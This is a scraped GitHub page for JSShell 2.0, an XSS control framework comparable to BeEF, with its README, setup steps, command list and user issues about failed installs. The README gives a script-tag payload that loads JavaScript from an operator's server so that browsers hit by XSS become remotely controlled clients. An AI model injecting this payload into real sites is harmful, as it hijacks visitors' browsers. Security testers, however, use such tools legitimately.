den1al / jsshell Goto Github PK

An interactive multi-user web JS shell

Python 85.65% JavaScript 11.94% HTML 0.74% Dockerfile 0.55% Shell 1.12%

python python-3-6 javascript shell web interactive xss exploit

jsshell's Introduction

JSShell 2.0

An interactive multi-user web based javascript shell. It was initially created in order to debug remote esoteric browsers during experiments and research. This tool can be easily attached to XSS (Cross Site Scripting) payload to achieve browser remote code execution (similar to the BeeF framework).

Version 2.0 is created entirely from scratch, introducing new exciting features, stability and maintainability.

Version: 2.0

Author

Daniel Abeles.

Shell Video

Features

Multi client support
Cyclic DOM objects support
Pre flight scripts
Command Queue & Context
Extensible with Plugins
Injectable via <script> tags
Dumping command output to file
Shell pagination
HTTPS support!

Installation & Setup

Config File

In the resources directory, update the config.json file with your desired configuration:

Database host - if running with the docker deployment method, choose the database host as db (which is the internal host name).
Return URL - the URL which the requests will follow. The shell.js file does some AJAX calls to register and poll for new commands. Usually it will be http[s]://{YOUR_SERVER_IP}:{PORT}.
Startup script - a script that runs automatically when the JSShell CLI client is spawned.
Domain - if you desire to generate TLS certificates, this is the domain name the server will use.
It is also possible to point at a remote database if desired.

Let's Encrypt

Now JSShell supports TLS, which means you can now generate TLS certificates and feed them to the web server. The web server will infer the domain name from the config.json file. In order to create the certificate, use the create_cert.py script in the scripts folder:

$ cd scripts
$ python create_cert.py --domain <YOUR_DOMAIN> --email <YOUR_EMAIL>

the email field is optional.

Please note that the web server must be down in order for the script to function properly. At this point, we have successfully generated our certificates! The sole modifications we need to do are:

In the config.json file, change the schema of the URL field to https.
In the docker-compose.yml file change the exposed port of the web container to 443.

Docker

This new version supports installing and running JSShell via docker and docker-compose. Now, to install and run the entire JSShell framework, simply run:

$ ./scripts/start_docker_shell.sh

This will:

Start and create the database in the background
Start the web API server that handles incoming connections in the background
Spawn a new instance of the JSShell command line interface container

Regular

If you still want to use the old fashion method of installing, simply make sure you have a MongoDB database up and running, and update the config.json file residing in the resources directory.

I recommend using a virtual environment with pyenv:

$ pyenv virtualenv -p python3.6 venv
$ pyenv activate venv

Or using virtualenv:

$ virtualenv -p python3.6 venv
$ source venv/bin/activate

Then, install the requirements:

$ pip install -r requirements.txt

Running

If you used the docker method, there's no need to run the following procedure.

Web Server

Otherwise, once we have the database setup, we need to start the web API server. To do, run:

$ python manage.py web

This will create and run a web server that listens to incoming connections and serves our JSShell code.

Shell

Now to start the JSShell CLI, run the same script but now with the shell flag:

$ python manage.py shell

Usage

After setup and running the required components, enter the help command to see the available commands:

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>>

Flow

JSShell supports 2 methods of operation:

Injectable Shell (similar to BeeF framework)
Hosted Shell (for debugging)

Injectable Shell

Similar to other XSS control frameworks (like BeeF), JSShell is capable of managing successful XSS exploitations. In example, if you can inject a script tag, inject the following resource to your payload, and a new client will appear in your console:

<script src="http[s]://{YOUR_SERVER_IP}:{PORT}/content/js"></script>

Hosted Shell

If you desire to debug exotic and esoteric browsers, you can simply navigate to http[s]://{YOUR_SERVER_IP}:{PORT}/ and a new client will pop up into your JSShell CLI client. Now it is debuggable via our JSShell console.

Credits

Canop for JSON.prune

use it at your own responsibility and risk.

jsshell's People

Contributors

Stargazers

Watchers

jsshell's Issues

Help me ASAp Please

root@kali:/opt/JSShell# python manage.py web
Traceback (most recent call last):
File "manage.py", line 23, in
).get(args.mode)()
File "manage.py", line 8, in handle_web
from web import start_api_server
File "/opt/JSShell/web/init.py", line 24
def start_api_server() -> None:

Cannot install from Docker or regular way

Running ./scripts/start_docker_shell.sh fails:

running JSShell 2.0 CLI ...
db not exists, creating it...
jsshell-master_db_1 is up-to-date
web API not exists, creating it...
Building web
Step 1/9 : FROM python:3.6-jessie
 ---> 890456b21ed5
Step 2/9 : RUN apt-get update
 ---> Using cache
 ---> 266133288743
Step 3/9 : RUN apt-get install software-properties-common less vim -y
 ---> Using cache
 ---> 2d8c3877cd63
Step 4/9 : ENV INSTALL_PATH /app/
 ---> Using cache
 ---> e288e0d6ca01
Step 5/9 : RUN mkdir -p $INSTALL_PATH
 ---> Using cache
 ---> 612d2c5e43bc
Step 6/9 : WORKDIR $INSTALL_PATH
 ---> Using cache
 ---> 2d3a57cbf551
Step 7/9 : COPY requirements.txt requirements.txt
 ---> Using cache
 ---> 7cec26c3660a
Step 8/9 : RUN pip install -r requirements.txt
 ---> Using cache
 ---> 433715145f67
Step 9/9 : COPY . .
 ---> Using cache
 ---> 5d2006eaa508
Successfully built 5d2006eaa508
Successfully tagged jsshell-master_web:latest
jsshell-master_db_1 is up-to-date
Starting jsshell-master_web_1 ... error

ERROR: for jsshell-master_web_1  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'

ERROR: for web  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'
ERROR: Encountered errors while bringing up the project.
Starting jsshell-master_db_1 ... done
Starting jsshell-master_web_1 ... error

ERROR: for jsshell-master_web_1  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'

ERROR: for web  Cannot start service web: b'Mounts denied: \r\nThe path /etc/letsencrypt\r\nis not shared from OS X and is not known to Docker.\r\nYou can configure shared paths from Docker -> Preferences... -> File Sharing.\r\nSee https://docs.docker.com/docker-for-mac/osxfs/#namespaces for more info.\r\n.'
ERROR: Encountered errors while bringing up the project.

Running python manage.py web fails too:


 * Serving Flask app "web" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "manage.py", line 23, in <module>
    ).get(args.mode)()
  File "manage.py", line 9, in handle_web
    start_api_server()
  File "/Users/kaatt/Downloads/JSShell-master/web/__init__.py", line 36, in start_api_server
    lets_encrypt_base_path + 'privkey.pem'
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/flask/app.py", line 943, in run
    run_simple(host, port, self, **options)
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 1009, in run_simple
    inner()
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 962, in inner
    fd=fd,
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 805, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 723, in __init__
    self.socket = ssl_context.wrap_socket(sock, server_side=True)
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/werkzeug/serving.py", line 611, in wrap_socket
    **kwargs
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/ssl.py", line 1232, in wrap_socket
    context.load_cert_chain(certfile, keyfile)
FileNotFoundError: [Errno 2] No such file or directory

Really want to use this. Can you help troubleshoot what's the issue here?

Shell command with client?

We can run a command like id on client when they connect to our shell right? Or is it js only

Support HTTPS server

As you know, you cannot load an external javascript content from an HTTP server to an HTTPS server.

https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content/How_to_fix_website_with_mixed_content

If your website delivers HTTPS pages, all active mixed content delivered via HTTP on this pages will be blocked by default.

Any plan to support HTTPS ?

Remove all/one clients

The ability to remove one or all client can be a nice feature to add :)

JSShell not work property

When I run python3.5 shell.py I recieve this from terminal

File "shell.py", line 161
SyntaxError: Non-ASCII character '\xe2' in file shell.py on line 162, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details

Help Please